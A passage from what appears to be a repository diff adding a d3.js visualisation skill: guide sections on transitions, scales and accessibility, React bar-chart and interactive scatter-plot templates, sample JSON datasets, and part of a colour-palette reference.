// window.dispatchEvent(new CustomEvent('chartClick', { detail: d }));
|
||||
});
|
||||
```
|

## Transitions and animations

Add smooth transitions to visual changes:

```javascript
// Basic transition
circles
  .transition()
  .duration(750)
  .attr("r", 10);

// Chained transitions
circles
  .transition()
  .duration(500)
  .attr("fill", "orange")
  .transition()
  .duration(500)
  .attr("r", 15);

// Staggered transitions
circles
  .transition()
  .delay((d, i) => i * 50)
  .duration(500)
  .attr("cy", d => yScale(d.value));

// Custom easing
circles
  .transition()
  .duration(1000)
  .ease(d3.easeBounceOut)
  .attr("r", 10);
```

## Scales reference

### Quantitative scales

```javascript
// Linear scale
const xScale = d3.scaleLinear()
  .domain([0, 100])
  .range([0, 500]);

// Log scale (for exponential data)
const logScale = d3.scaleLog()
  .domain([1, 1000])
  .range([0, 500]);

// Power scale
const powScale = d3.scalePow()
  .exponent(2)
  .domain([0, 100])
  .range([0, 500]);

// Time scale
const timeScale = d3.scaleTime()
  .domain([new Date(2020, 0, 1), new Date(2024, 0, 1)])
  .range([0, 500]);
```

### Ordinal scales

```javascript
// Band scale (for bar charts)
const bandScale = d3.scaleBand()
  .domain(['A', 'B', 'C', 'D'])
  .range([0, 400])
  .padding(0.1);

// Point scale (for line/scatter categories)
const pointScale = d3.scalePoint()
  .domain(['A', 'B', 'C', 'D'])
  .range([0, 400]);

// Ordinal scale (for colours)
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
```

### Sequential scales

```javascript
// Sequential colour scale
const colourScale = d3.scaleSequential(d3.interpolateBlues)
  .domain([0, 100]);

// Diverging colour scale
const divScale = d3.scaleDiverging(d3.interpolateRdBu)
  .domain([-10, 0, 10]);
```

## Best practices

### Data preparation

Always validate and prepare data before visualisation:

```javascript
// Filter invalid values
const cleanData = data.filter(d => d.value != null && !isNaN(d.value));

// Sort data if order matters
const sortedData = [...data].sort((a, b) => b.value - a.value);

// Parse dates
const parsedData = data.map(d => ({
  ...d,
  date: d3.timeParse("%Y-%m-%d")(d.date)
}));
```

### Performance optimisation

For large datasets (>1000 elements):

```javascript
// Use canvas instead of SVG for many elements
// Use quadtree for collision detection
// Simplify paths with d3.line().curve(d3.curveStep)
// Implement virtual scrolling for large lists
// Use requestAnimationFrame for custom animations
```
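One item that pairs with all of the above is debouncing expensive redraws. A minimal sketch, with no d3 dependency — `debounce` is our own helper name, not a d3 API:

```javascript
// Collapse a burst of events into a single call: the wrapped function
// only fires once `wait` ms have passed with no further invocations.
function debounce(fn, wait) {
  let timer = null;
  return function (...args) {
    clearTimeout(timer);
    timer = setTimeout(() => fn.apply(this, args), wait);
  };
}

// Browser usage (sketch): redraw at most once per pause in resizing.
// window.addEventListener("resize", debounce(() => drawChart(data), 150));
```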

### Accessibility

Make visualisations accessible:

```javascript
// Add ARIA labels
svg.attr("role", "img")
  .attr("aria-label", "Bar chart showing quarterly revenue");

// Add title and description
svg.append("title").text("Quarterly Revenue 2024");
svg.append("desc").text("Bar chart showing revenue growth across four quarters");

// Ensure sufficient colour contrast
// Provide keyboard navigation for interactive elements
// Include data table alternative
```

### Styling

Use consistent, professional styling:

```javascript
// Define colour palettes upfront
const colours = {
  primary: '#4A90E2',
  secondary: '#7B68EE',
  background: '#F5F7FA',
  text: '#333333',
  gridLines: '#E0E0E0'
};

// Apply consistent typography
svg.selectAll("text")
  .style("font-family", "Inter, sans-serif")
  .style("font-size", "12px");

// Use subtle grid lines
g.selectAll(".tick line")
  .attr("stroke", colours.gridLines)
  .attr("stroke-dasharray", "2,2");
```

## Common issues and solutions

**Issue**: Axes not appearing

- Ensure scales have valid domains (check for NaN values)
- Verify the axis is appended to the correct group
- Check that transform translations are correct

**Issue**: Transitions not working

- Call `.transition()` before attribute changes
- Ensure elements have unique keys for proper data binding
- Check that useEffect dependencies include all changing data

**Issue**: Responsive sizing not working

- Use ResizeObserver or a window resize listener
- Update dimensions in state to trigger a re-render
- Ensure the SVG has width/height attributes or a viewBox

**Issue**: Performance problems

- Limit the number of DOM elements (consider canvas for >1000 items)
- Debounce resize handlers
- Use `.join()` instead of separate enter/update/exit selections
- Avoid unnecessary re-renders by checking dependencies
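The responsive-sizing checklist can be wrapped in a small helper. This is a sketch: `observeSize` is a hypothetical name, and the guard simply makes it a no-op in environments without `ResizeObserver`:

```javascript
// Watch an element's rendered size and call onResize(width, height) on
// every change. Returns a cleanup function for use in effect teardown.
// `observeSize` is a hypothetical helper name, not a d3 or React API.
function observeSize(element, onResize) {
  if (typeof ResizeObserver === "undefined") return () => {}; // SSR/Node safety
  const observer = new ResizeObserver((entries) => {
    const { width, height } = entries[0].contentRect;
    onResize(width, height);
  });
  observer.observe(element);
  return () => observer.disconnect();
}

// In React (sketch): call inside useEffect, store width/height in state,
// and give the SVG a viewBox so it scales with its container.
```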

## Resources

### references/

Contains detailed reference materials:

- `d3-patterns.md` - Comprehensive collection of visualisation patterns and code examples
- `scale-reference.md` - Complete guide to d3 scales with examples
- `colour-schemes.md` - D3 colour schemes and palette recommendations

### assets/

Contains boilerplate templates:

- `chart-template.jsx` - Starter template for a basic chart
- `interactive-template.jsx` - Template with tooltips, zoom, and interactions
- `sample-data.json` - Example datasets for testing

These templates work with vanilla JavaScript, React, Vue, Svelte, or any other JavaScript environment. Adapt them as needed for your specific framework.

To use these resources, read the relevant files when detailed guidance is needed for specific visualisation types or patterns.

## File: skills/claude-d3js-skill/assets/chart-template.jsx (new file, 106 lines)

```jsx
import { useEffect, useRef } from 'react';
import * as d3 from 'd3';

function BasicChart({ data }) {
  const svgRef = useRef();

  useEffect(() => {
    if (!data || data.length === 0) return;

    // Select SVG element
    const svg = d3.select(svgRef.current);
    svg.selectAll("*").remove(); // Clear previous content

    // Define dimensions and margins
    const width = 800;
    const height = 400;
    const margin = { top: 20, right: 30, bottom: 40, left: 50 };
    const innerWidth = width - margin.left - margin.right;
    const innerHeight = height - margin.top - margin.bottom;

    // Create main group with margins
    const g = svg.append("g")
      .attr("transform", `translate(${margin.left},${margin.top})`);

    // Create scales
    const xScale = d3.scaleBand()
      .domain(data.map(d => d.label))
      .range([0, innerWidth])
      .padding(0.1);

    const yScale = d3.scaleLinear()
      .domain([0, d3.max(data, d => d.value)])
      .range([innerHeight, 0])
      .nice();

    // Create and append axes
    const xAxis = d3.axisBottom(xScale);
    const yAxis = d3.axisLeft(yScale);

    g.append("g")
      .attr("class", "x-axis")
      .attr("transform", `translate(0,${innerHeight})`)
      .call(xAxis);

    g.append("g")
      .attr("class", "y-axis")
      .call(yAxis);

    // Bind data and create visual elements (bars in this example)
    g.selectAll("rect")
      .data(data)
      .join("rect")
      .attr("x", d => xScale(d.label))
      .attr("y", d => yScale(d.value))
      .attr("width", xScale.bandwidth())
      .attr("height", d => innerHeight - yScale(d.value))
      .attr("fill", "steelblue");

    // Optional: Add axis labels
    g.append("text")
      .attr("class", "axis-label")
      .attr("x", innerWidth / 2)
      .attr("y", innerHeight + margin.bottom - 5)
      .attr("text-anchor", "middle")
      .text("Category");

    g.append("text")
      .attr("class", "axis-label")
      .attr("transform", "rotate(-90)")
      .attr("x", -innerHeight / 2)
      .attr("y", -margin.left + 15)
      .attr("text-anchor", "middle")
      .text("Value");

  }, [data]);

  return (
    <div className="chart-container">
      <svg
        ref={svgRef}
        width="800"
        height="400"
        style={{ border: '1px solid #ddd' }}
      />
    </div>
  );
}

// Example usage
export default function App() {
  const sampleData = [
    { label: 'A', value: 30 },
    { label: 'B', value: 80 },
    { label: 'C', value: 45 },
    { label: 'D', value: 60 },
    { label: 'E', value: 20 },
    { label: 'F', value: 90 }
  ];

  return (
    <div className="p-8">
      <h1 className="text-2xl font-bold mb-4">Basic D3.js Chart</h1>
      <BasicChart data={sampleData} />
    </div>
  );
}
```

## File: skills/claude-d3js-skill/assets/interactive-template.jsx (new file, 227 lines)

```jsx
import { useEffect, useRef, useState } from 'react';
import * as d3 from 'd3';

function InteractiveChart({ data }) {
  const svgRef = useRef();
  const tooltipRef = useRef();
  const [selectedPoint, setSelectedPoint] = useState(null);

  useEffect(() => {
    if (!data || data.length === 0) return;

    const svg = d3.select(svgRef.current);
    svg.selectAll("*").remove();

    // Dimensions
    const width = 800;
    const height = 500;
    const margin = { top: 20, right: 30, bottom: 40, left: 50 };
    const innerWidth = width - margin.left - margin.right;
    const innerHeight = height - margin.top - margin.bottom;

    // Create main group
    const g = svg.append("g")
      .attr("transform", `translate(${margin.left},${margin.top})`);

    // Scales
    const xScale = d3.scaleLinear()
      .domain([0, d3.max(data, d => d.x)])
      .range([0, innerWidth])
      .nice();

    const yScale = d3.scaleLinear()
      .domain([0, d3.max(data, d => d.y)])
      .range([innerHeight, 0])
      .nice();

    const sizeScale = d3.scaleSqrt()
      .domain([0, d3.max(data, d => d.size || 10)])
      .range([3, 20]);

    const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

    // Add zoom behaviour
    const zoom = d3.zoom()
      .scaleExtent([0.5, 10])
      .on("zoom", (event) => {
        g.attr("transform", `translate(${margin.left + event.transform.x},${margin.top + event.transform.y}) scale(${event.transform.k})`);
      });

    svg.call(zoom);

    // Axes
    const xAxis = d3.axisBottom(xScale);
    const yAxis = d3.axisLeft(yScale);

    g.append("g")
      .attr("class", "x-axis")
      .attr("transform", `translate(0,${innerHeight})`)
      .call(xAxis);

    g.append("g")
      .attr("class", "y-axis")
      .call(yAxis);

    // Grid lines
    g.append("g")
      .attr("class", "grid")
      .attr("opacity", 0.1)
      .call(d3.axisLeft(yScale)
        .tickSize(-innerWidth)
        .tickFormat(""));

    g.append("g")
      .attr("class", "grid")
      .attr("opacity", 0.1)
      .attr("transform", `translate(0,${innerHeight})`)
      .call(d3.axisBottom(xScale)
        .tickSize(-innerHeight)
        .tickFormat(""));

    // Tooltip
    const tooltip = d3.select(tooltipRef.current);

    // Data points
    const circles = g.selectAll("circle")
      .data(data)
      .join("circle")
      .attr("cx", d => xScale(d.x))
      .attr("cy", d => yScale(d.y))
      .attr("r", d => sizeScale(d.size || 10))
      .attr("fill", d => colourScale(d.category || 'default'))
      .attr("stroke", "#fff")
      .attr("stroke-width", 2)
      .attr("opacity", 0.7)
      .style("cursor", "pointer");

    // Hover interactions
    circles
      .on("mouseover", function(event, d) {
        // Enlarge circle
        d3.select(this)
          .transition()
          .duration(200)
          .attr("opacity", 1)
          .attr("stroke-width", 3);

        // Show tooltip
        tooltip
          .style("display", "block")
          .style("left", (event.pageX + 10) + "px")
          .style("top", (event.pageY - 10) + "px")
          .html(`
            <strong>${d.label || 'Point'}</strong><br/>
            X: ${d.x.toFixed(2)}<br/>
            Y: ${d.y.toFixed(2)}<br/>
            ${d.category ? `Category: ${d.category}<br/>` : ''}
            ${d.size ? `Size: ${d.size.toFixed(2)}` : ''}
          `);
      })
      .on("mousemove", function(event) {
        tooltip
          .style("left", (event.pageX + 10) + "px")
          .style("top", (event.pageY - 10) + "px");
      })
      .on("mouseout", function() {
        // Restore circle
        d3.select(this)
          .transition()
          .duration(200)
          .attr("opacity", 0.7)
          .attr("stroke-width", 2);

        // Hide tooltip
        tooltip.style("display", "none");
      })
      .on("click", function(event, d) {
        // Highlight selected point
        circles.attr("stroke", "#fff").attr("stroke-width", 2);
        d3.select(this)
          .attr("stroke", "#000")
          .attr("stroke-width", 3);

        setSelectedPoint(d);
      });

    // Add transition on initial render
    circles
      .attr("r", 0)
      .transition()
      .duration(800)
      .delay((d, i) => i * 20)
      .attr("r", d => sizeScale(d.size || 10));

    // Axis labels
    g.append("text")
      .attr("class", "axis-label")
      .attr("x", innerWidth / 2)
      .attr("y", innerHeight + margin.bottom - 5)
      .attr("text-anchor", "middle")
      .style("font-size", "14px")
      .text("X Axis");

    g.append("text")
      .attr("class", "axis-label")
      .attr("transform", "rotate(-90)")
      .attr("x", -innerHeight / 2)
      .attr("y", -margin.left + 15)
      .attr("text-anchor", "middle")
      .style("font-size", "14px")
      .text("Y Axis");

  }, [data]);

  return (
    <div className="relative">
      <svg
        ref={svgRef}
        width="800"
        height="500"
        style={{ border: '1px solid #ddd', cursor: 'grab' }}
      />
      <div
        ref={tooltipRef}
        style={{
          position: 'absolute',
          display: 'none',
          padding: '10px',
          background: 'white',
          border: '1px solid #ddd',
          borderRadius: '4px',
          pointerEvents: 'none',
          boxShadow: '0 2px 4px rgba(0,0,0,0.1)',
          fontSize: '13px',
          zIndex: 1000
        }}
      />
      {selectedPoint && (
        <div className="mt-4 p-4 bg-blue-50 rounded border border-blue-200">
          <h3 className="font-bold mb-2">Selected Point</h3>
          <pre className="text-sm">{JSON.stringify(selectedPoint, null, 2)}</pre>
        </div>
      )}
    </div>
  );
}

// Example usage
export default function App() {
  const sampleData = Array.from({ length: 50 }, (_, i) => ({
    id: i,
    label: `Point ${i + 1}`,
    x: Math.random() * 100,
    y: Math.random() * 100,
    size: Math.random() * 30 + 5,
    category: ['A', 'B', 'C', 'D'][Math.floor(Math.random() * 4)]
  }));

  return (
    <div className="p-8">
      <h1 className="text-2xl font-bold mb-2">Interactive D3.js Chart</h1>
      <p className="text-gray-600 mb-4">
        Hover over points for details. Click to select. Scroll to zoom. Drag to pan.
      </p>
      <InteractiveChart data={sampleData} />
    </div>
  );
}
```

## File: skills/claude-d3js-skill/assets/sample-data.json (new file, 115 lines)

```json
{
  "timeSeries": [
    { "date": "2024-01-01", "value": 120, "category": "A" },
    { "date": "2024-02-01", "value": 135, "category": "A" },
    { "date": "2024-03-01", "value": 128, "category": "A" },
    { "date": "2024-04-01", "value": 145, "category": "A" },
    { "date": "2024-05-01", "value": 152, "category": "A" },
    { "date": "2024-06-01", "value": 168, "category": "A" },
    { "date": "2024-07-01", "value": 175, "category": "A" },
    { "date": "2024-08-01", "value": 182, "category": "A" },
    { "date": "2024-09-01", "value": 190, "category": "A" },
    { "date": "2024-10-01", "value": 185, "category": "A" },
    { "date": "2024-11-01", "value": 195, "category": "A" },
    { "date": "2024-12-01", "value": 210, "category": "A" }
  ],

  "categorical": [
    { "label": "Product A", "value": 450, "category": "Electronics" },
    { "label": "Product B", "value": 320, "category": "Electronics" },
    { "label": "Product C", "value": 580, "category": "Clothing" },
    { "label": "Product D", "value": 290, "category": "Clothing" },
    { "label": "Product E", "value": 410, "category": "Food" },
    { "label": "Product F", "value": 370, "category": "Food" }
  ],

  "scatterData": [
    { "x": 12, "y": 45, "size": 25, "category": "Group A", "label": "Point 1" },
    { "x": 25, "y": 62, "size": 35, "category": "Group A", "label": "Point 2" },
    { "x": 38, "y": 55, "size": 20, "category": "Group B", "label": "Point 3" },
    { "x": 45, "y": 78, "size": 40, "category": "Group B", "label": "Point 4" },
    { "x": 52, "y": 68, "size": 30, "category": "Group C", "label": "Point 5" },
    { "x": 65, "y": 85, "size": 45, "category": "Group C", "label": "Point 6" },
    { "x": 72, "y": 72, "size": 28, "category": "Group A", "label": "Point 7" },
    { "x": 85, "y": 92, "size": 50, "category": "Group B", "label": "Point 8" }
  ],

  "hierarchical": {
    "name": "Root",
    "children": [
      {
        "name": "Category 1",
        "children": [
          { "name": "Item 1.1", "value": 100 },
          { "name": "Item 1.2", "value": 150 },
          { "name": "Item 1.3", "value": 80 }
        ]
      },
      {
        "name": "Category 2",
        "children": [
          { "name": "Item 2.1", "value": 200 },
          { "name": "Item 2.2", "value": 120 },
          { "name": "Item 2.3", "value": 90 }
        ]
      },
      {
        "name": "Category 3",
        "children": [
          { "name": "Item 3.1", "value": 180 },
          { "name": "Item 3.2", "value": 140 }
        ]
      }
    ]
  },

  "network": {
    "nodes": [
      { "id": "A", "group": 1 },
      { "id": "B", "group": 1 },
      { "id": "C", "group": 1 },
      { "id": "D", "group": 2 },
      { "id": "E", "group": 2 },
      { "id": "F", "group": 3 },
      { "id": "G", "group": 3 },
      { "id": "H", "group": 3 }
    ],
    "links": [
      { "source": "A", "target": "B", "value": 1 },
      { "source": "A", "target": "C", "value": 2 },
      { "source": "B", "target": "C", "value": 1 },
      { "source": "C", "target": "D", "value": 3 },
      { "source": "D", "target": "E", "value": 2 },
      { "source": "E", "target": "F", "value": 1 },
      { "source": "F", "target": "G", "value": 2 },
      { "source": "F", "target": "H", "value": 1 },
      { "source": "G", "target": "H", "value": 1 }
    ]
  },

  "stackedData": [
    { "group": "Q1", "seriesA": 30, "seriesB": 40, "seriesC": 25 },
    { "group": "Q2", "seriesA": 45, "seriesB": 35, "seriesC": 30 },
    { "group": "Q3", "seriesA": 40, "seriesB": 50, "seriesC": 35 },
    { "group": "Q4", "seriesA": 55, "seriesB": 45, "seriesC": 40 }
  ],

  "geographicPoints": [
    { "city": "London", "latitude": 51.5074, "longitude": -0.1278, "value": 8900000 },
    { "city": "Paris", "latitude": 48.8566, "longitude": 2.3522, "value": 2140000 },
    { "city": "Berlin", "latitude": 52.5200, "longitude": 13.4050, "value": 3645000 },
    { "city": "Madrid", "latitude": 40.4168, "longitude": -3.7038, "value": 3223000 },
    { "city": "Rome", "latitude": 41.9028, "longitude": 12.4964, "value": 2873000 }
  ],

  "divergingData": [
    { "category": "Item A", "value": -15 },
    { "category": "Item B", "value": 8 },
    { "category": "Item C", "value": -22 },
    { "category": "Item D", "value": 18 },
    { "category": "Item E", "value": -5 },
    { "category": "Item F", "value": 25 },
    { "category": "Item G", "value": -12 },
    { "category": "Item H", "value": 14 }
  ]
}
```

## File: skills/claude-d3js-skill/references/colour-schemes.md (new file, 564 lines)

||||
# D3.js Colour Schemes and Palette Recommendations
|
||||
|
||||
Comprehensive guide to colour selection in data visualisation with d3.js.
|
||||
|
||||
## Built-in categorical colour schemes
|
||||
|
||||
### Category10 (default)
|
||||
|
||||
```javascript
|
||||
d3.schemeCategory10
|
||||
// ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd',
|
||||
// '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- 10 distinct colours
|
||||
- Good colour-blind accessibility
|
||||
- Default choice for most categorical data
|
||||
- Balanced saturation and brightness
|
||||
|
||||
**Use cases:** General purpose categorical encoding, legend items, multiple data series
|
||||
|
||||
### Tableau10
|
||||
|
||||
```javascript
|
||||
d3.schemeTableau10
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- 10 colours optimised for data visualisation
|
||||
- Professional appearance
|
||||
- Excellent distinguishability
|
||||
|
||||
**Use cases:** Business dashboards, professional reports, presentations
|
||||
|
||||
### Accent
|
||||
|
||||
```javascript
|
||||
d3.schemeAccent
|
||||
// 8 colours with high saturation
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Bright, vibrant colours
|
||||
- High contrast
|
||||
- Modern aesthetic
|
||||
|
||||
**Use cases:** Highlighting important categories, modern web applications
|
||||
|
||||
### Dark2
|
||||
|
||||
```javascript
|
||||
d3.schemeDark2
|
||||
// 8 darker, muted colours
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Subdued palette
|
||||
- Professional appearance
|
||||
- Good for dark backgrounds
|
||||
|
||||
**Use cases:** Dark mode visualisations, professional contexts
|
||||
|
||||
### Paired
|
||||
|
||||
```javascript
|
||||
d3.schemePaired
|
||||
// 12 colours in pairs of similar hues
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Pairs of light and dark variants
|
||||
- Useful for nested categories
|
||||
- 12 distinct colours
|
||||
|
||||
**Use cases:** Grouped bar charts, hierarchical categories, before/after comparisons
|
||||
|
||||
### Pastel1 & Pastel2
|
||||
|
||||
```javascript
|
||||
d3.schemePastel1 // 9 colours
|
||||
d3.schemePastel2 // 8 colours
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Soft, low-saturation colours
|
||||
- Gentle appearance
|
||||
- Good for large areas
|
||||
|
||||
**Use cases:** Background colours, subtle categorisation, calming visualisations
|
||||
|
||||
### Set1, Set2, Set3
|
||||
|
||||
```javascript
|
||||
d3.schemeSet1 // 9 colours - vivid
|
||||
d3.schemeSet2 // 8 colours - muted
|
||||
d3.schemeSet3 // 12 colours - pastel
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Set1: High saturation, maximum distinction
|
||||
- Set2: Professional, balanced
|
||||
- Set3: Subtle, many categories
|
||||
|
||||
**Use cases:** Varied based on visual hierarchy needs
|
||||
|
||||
## Sequential colour schemes
|
||||
|
||||
Sequential schemes map continuous data from low to high values using a single hue or gradient.
|
||||
|
||||
### Single-hue sequential
|
||||
|
||||
**Blues:**
|
||||
```javascript
|
||||
d3.interpolateBlues
|
||||
d3.schemeBlues[9] // 9-step discrete version
|
||||
```
|
||||
|
||||
**Other single-hue options:**
|
||||
- `d3.interpolateGreens` / `d3.schemeGreens`
|
||||
- `d3.interpolateOranges` / `d3.schemeOranges`
|
||||
- `d3.interpolatePurples` / `d3.schemePurples`
|
||||
- `d3.interpolateReds` / `d3.schemeReds`
|
||||
- `d3.interpolateGreys` / `d3.schemeGreys`
|
||||
|
||||
**Use cases:**
|
||||
- Simple heat maps
|
||||
- Choropleth maps
|
||||
- Density plots
|
||||
- Single-metric visualisations
|
||||
|
||||
### Multi-hue sequential
|
||||
|
||||
**Viridis (recommended):**
|
||||
```javascript
|
||||
d3.interpolateViridis
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Perceptually uniform
|
||||
- Colour-blind friendly
|
||||
- Print-safe
|
||||
- No visual dead zones
|
||||
- Monotonically increasing perceived lightness
|
||||
|
||||
**Other perceptually-uniform options:**
|
||||
- `d3.interpolatePlasma` - Purple to yellow
|
||||
- `d3.interpolateInferno` - Black to white through red/orange
|
||||
- `d3.interpolateMagma` - Black to white through purple
|
||||
- `d3.interpolateCividis` - Colour-blind optimised
|
||||
|
||||
**Colour-blind accessible:**
|
||||
```javascript
|
||||
d3.interpolateTurbo // Rainbow-like but perceptually uniform
|
||||
d3.interpolateCool // Cyan to magenta
|
||||
d3.interpolateWarm // Orange to yellow
|
||||
```
|
||||
|
||||
**Use cases:**
|
||||
- Scientific visualisation
|
||||
- Medical imaging
|
||||
- Any high-precision data visualisation
|
||||
- Accessible visualisations
|
||||
|
||||
### Traditional sequential
|
||||
|
||||
**Yellow-Orange-Red:**
|
||||
```javascript
|
||||
d3.interpolateYlOrRd
|
||||
d3.schemeYlOrRd[9]
|
||||
```
|
||||
|
||||
**Yellow-Green-Blue:**
|
||||
```javascript
|
||||
d3.interpolateYlGnBu
|
||||
d3.schemeYlGnBu[9]
|
||||
```
|
||||
|
||||
**Other multi-hue:**
|
||||
- `d3.interpolateBuGn` - Blue to green
|
||||
- `d3.interpolateBuPu` - Blue to purple
|
||||
- `d3.interpolateGnBu` - Green to blue
|
||||
- `d3.interpolateOrRd` - Orange to red
|
||||
- `d3.interpolatePuBu` - Purple to blue
|
||||
- `d3.interpolatePuBuGn` - Purple to blue-green
|
||||
- `d3.interpolatePuRd` - Purple to red
|
||||
- `d3.interpolateRdPu` - Red to purple
|
||||
- `d3.interpolateYlGn` - Yellow to green
|
||||
- `d3.interpolateYlOrBr` - Yellow to orange-brown
|
||||
|
||||
**Use cases:** Traditional data visualisation, familiar colour associations (temperature, vegetation, water)
|
||||
|
||||
## Diverging colour schemes
|
||||
|
||||
Diverging schemes highlight deviations from a central value using two distinct hues.
|
||||
|
||||
### Red-Blue (temperature)
|
||||
|
||||
```javascript
|
||||
d3.interpolateRdBu
|
||||
d3.schemeRdBu[11]
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Intuitive temperature metaphor
|
||||
- Strong contrast
|
||||
- Clear positive/negative distinction
|
||||
|
||||
**Use cases:** Temperature, profit/loss, above/below average, correlation
|
||||
|
||||
### Red-Yellow-Blue
|
||||
|
||||
```javascript
|
||||
d3.interpolateRdYlBu
|
||||
d3.schemeRdYlBu[11]
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- Three-colour gradient
|
||||
- Softer transition through yellow
|
||||
- More visual steps
|
||||
|
||||
**Use cases:** When extreme values need emphasis and middle needs visibility
|
||||
|
||||
### Other diverging schemes
|
||||
|
||||
**Traffic light:**
|
||||
```javascript
|
||||
d3.interpolateRdYlGn // Red (bad) to green (good)
|
||||
```
|
||||
|
||||
**Spectral (rainbow):**
|
||||
```javascript
|
||||
d3.interpolateSpectral // Full spectrum
|
||||
```
|
||||
|
||||
**Other options:**
|
||||
- `d3.interpolateBrBG` - Brown to blue-green
|
||||
- `d3.interpolatePiYG` - Pink to yellow-green
|
||||
- `d3.interpolatePRGn` - Purple to green
|
||||
- `d3.interpolatePuOr` - Purple to orange
|
||||
- `d3.interpolateRdGy` - Red to grey
|
||||
|
||||
**Use cases:** Choose based on semantic meaning and accessibility needs
|
||||
|
||||
## Colour-blind friendly palettes
|
||||
|
||||
### General guidelines
|
||||
|
||||
1. **Avoid red-green combinations** (most common colour blindness)
|
||||
2. **Use blue-orange diverging** instead of red-green
|
||||
3. **Add texture or patterns** as redundant encoding
|
||||
4. **Test with simulation tools**
|
||||
|
||||
### Recommended colour-blind safe schemes
|
||||
|
||||
**Categorical:**
|
||||
```javascript
|
||||
// Okabe-Ito palette (colour-blind safe)
|
||||
const okabePalette = [
|
||||
'#E69F00', // Orange
|
||||
'#56B4E9', // Sky blue
|
||||
'#009E73', // Bluish green
|
||||
'#F0E442', // Yellow
|
||||
'#0072B2', // Blue
|
||||
'#D55E00', // Vermillion
|
||||
'#CC79A7', // Reddish purple
|
||||
'#000000' // Black
|
||||
];
|
||||
|
||||
const colourScale = d3.scaleOrdinal()
|
||||
.domain(categories)
|
||||
.range(okabePalette);
|
||||
```
|
||||
|
||||
**Sequential:**
|
||||
```javascript
|
||||
// Use Viridis, Cividis, or Blues
d3.interpolateViridis  // Best overall
d3.interpolateCividis  // Optimised for CVD
d3.interpolateBlues    // Simple, safe
```

**Diverging:**

```javascript
// Use blue-orange instead of red-green
d3.interpolateBrBG
d3.interpolatePuOr
```

## Custom colour palettes

### Creating custom sequential

```javascript
const customSequential = d3.scaleLinear()
  .domain([0, 100])
  .range(['#e8f4f8', '#006d9c'])    // Light to dark blue
  .interpolate(d3.interpolateLab);  // Perceptually uniform
```

### Creating custom diverging

```javascript
const customDiverging = d3.scaleLinear()
  .domain([0, 50, 100])
  .range(['#ca0020', '#f7f7f7', '#0571b0'])  // Red, grey, blue
  .interpolate(d3.interpolateLab);
```

### Creating custom categorical

```javascript
// Brand colours
const brandPalette = [
  '#FF6B6B', // Primary red
  '#4ECDC4', // Secondary teal
  '#45B7D1', // Tertiary blue
  '#FFA07A', // Accent coral
  '#98D8C8'  // Accent mint
];

const colourScale = d3.scaleOrdinal()
  .domain(categories)
  .range(brandPalette);
```

## Semantic colour associations

### Universal colour meanings

**Red:**
- Danger, error, negative
- High temperature
- Debt, loss

**Green:**
- Success, positive
- Growth, vegetation
- Profit, gain

**Blue:**
- Trust, calm
- Water, cold
- Information, neutral

**Yellow/Orange:**
- Warning, caution
- Energy, warmth
- Attention

**Grey:**
- Neutral, inactive
- Missing data
- Background

### Context-specific palettes

**Financial:**

```javascript
const financialColours = {
  profit: '#27ae60',
  loss: '#e74c3c',
  neutral: '#95a5a6',
  highlight: '#3498db'
};
```

**Temperature:**

```javascript
const temperatureScale = d3.scaleSequential(d3.interpolateRdYlBu)
  .domain([40, -10]);  // Hot to cold (reversed)
```

**Traffic/Status:**

```javascript
const statusColours = {
  success: '#27ae60',
  warning: '#f39c12',
  error: '#e74c3c',
  info: '#3498db',
  neutral: '#95a5a6'
};
```

## Accessibility best practices

### Contrast ratios

Ensure sufficient contrast between colours and backgrounds:

```javascript
// Good contrast example
const highContrast = {
  background: '#ffffff',
  text: '#2c3e50',
  primary: '#3498db',
  secondary: '#e74c3c'
};
```

**WCAG guidelines:**
- Normal text: 4.5:1 minimum
- Large text: 3:1 minimum
- UI components: 3:1 minimum
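
The 4.5:1 and 3:1 thresholds above come from the WCAG 2.x contrast-ratio formula, which is small enough to compute directly. A minimal sketch in plain JavaScript (no d3; `luminance` and `contrastRatio` are illustrative helper names):

```javascript
// WCAG 2.x relative luminance of an sRGB hex colour like '#2c3e50'
function luminance(hex) {
  const [r, g, b] = [1, 3, 5]
    .map(i => parseInt(hex.slice(i, i + 2), 16) / 255)
    .map(c => (c <= 0.03928 ? c / 12.92 : Math.pow((c + 0.055) / 1.055, 2.4)));
  return 0.2126 * r + 0.7152 * g + 0.0722 * b;
}

// Contrast ratio between two colours: (L_light + 0.05) / (L_dark + 0.05)
function contrastRatio(hexA, hexB) {
  const [hi, lo] = [luminance(hexA), luminance(hexB)].sort((a, b) => b - a);
  return (hi + 0.05) / (lo + 0.05);
}
```

For example, white text on the `#2c3e50` background above comes out well above the 4.5:1 threshold, while white on black gives the maximum ratio of 21:1.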

### Redundant encoding

Never rely solely on colour to convey information:

```javascript
// Add patterns or shapes
const symbols = ['circle', 'square', 'triangle', 'diamond'];

// Add text labels
// Use line styles (solid, dashed, dotted)
// Use size encoding
```

### Testing

Test visualisations for colour blindness:
- Chrome DevTools (Rendering > Emulate vision deficiencies)
- Colour Oracle (free desktop application)
- Coblis (online simulator)

## Professional colour recommendations

### Data journalism

```javascript
// Guardian style
const guardianPalette = [
  '#005689', // Guardian blue
  '#c70000', // Guardian red
  '#7d0068', // Guardian pink
  '#951c75', // Guardian purple
];

// FT style
const ftPalette = [
  '#0f5499', // FT blue
  '#990f3d', // FT red
  '#593380', // FT purple
  '#262a33', // FT black
];
```

### Academic/Scientific

```javascript
// Nature journal style
const naturePalette = [
  '#0071b2', // Blue
  '#d55e00', // Vermillion
  '#009e73', // Green
  '#f0e442', // Yellow
];

// Use Viridis for continuous data
const scientificScale = d3.scaleSequential(d3.interpolateViridis);
```

### Corporate/Business

```javascript
// Professional, conservative
const corporatePalette = [
  '#003f5c', // Dark blue
  '#58508d', // Purple
  '#bc5090', // Magenta
  '#ff6361', // Coral
